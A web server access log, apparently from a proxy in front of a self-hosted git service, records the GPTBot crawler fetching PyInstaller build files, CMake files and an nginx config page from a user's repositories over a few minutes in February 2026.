"/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11046] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:03:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 9883] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" +[17/Feb/2026:16:03:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" +[17/Feb/2026:16:04:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 13192922] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" +[17/Feb/2026:16:04:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" +[17/Feb/2026:16:04:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 100066] [Gzip 29.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" +[17/Feb/2026:16:04:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 101228] [Gzip 29.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" +[17/Feb/2026:16:04:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 158884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" +[17/Feb/2026:16:04:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 4276110] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" +[17/Feb/2026:16:04:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 160654] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" +[17/Feb/2026:16:04:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:04:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:16:04:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 160535] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" +[17/Feb/2026:16:04:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 73286] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" +[17/Feb/2026:16:04:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 15176] [Gzip 6.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:04:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2381] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:04:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:04:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 10909] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:16:04:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 73286] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" +[17/Feb/2026:16:04:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 70803] [Gzip 17.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:16:04:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 158884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" +[17/Feb/2026:16:04:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 160654] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" +[17/Feb/2026:16:04:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 9918] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" +[17/Feb/2026:16:04:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 13193003] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" +[17/Feb/2026:16:04:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 4276110] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" +[17/Feb/2026:16:04:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 160654] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" +[17/Feb/2026:16:04:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 4276110] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" +[17/Feb/2026:16:04:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:16:04:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" +[17/Feb/2026:16:04:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 13192991] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" +[17/Feb/2026:16:04:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 9882] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" +[17/Feb/2026:16:04:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 99712] [Gzip 29.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" +[17/Feb/2026:16:04:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 159003] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" +[17/Feb/2026:16:04:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 4276110] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" +[17/Feb/2026:16:04:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 38614] [Gzip 14.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:16:04:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 15177] [Gzip 6.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:04:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 38590] [Gzip 14.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:16:04:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 4276110] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" +[17/Feb/2026:16:04:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 9889] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" +[17/Feb/2026:16:05:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 12909088] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" +[17/Feb/2026:16:05:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 4184405] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" +[17/Feb/2026:16:05:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 73286] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" +[17/Feb/2026:16:05:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html?display=rendered" [Client 74.7.227.38] [Length 10884] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html" +[17/Feb/2026:16:05:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10086] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:05:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/1.conf?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:16:05:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 9914] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" +[17/Feb/2026:16:05:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 49764] [Gzip 27.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" +[17/Feb/2026:16:05:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr 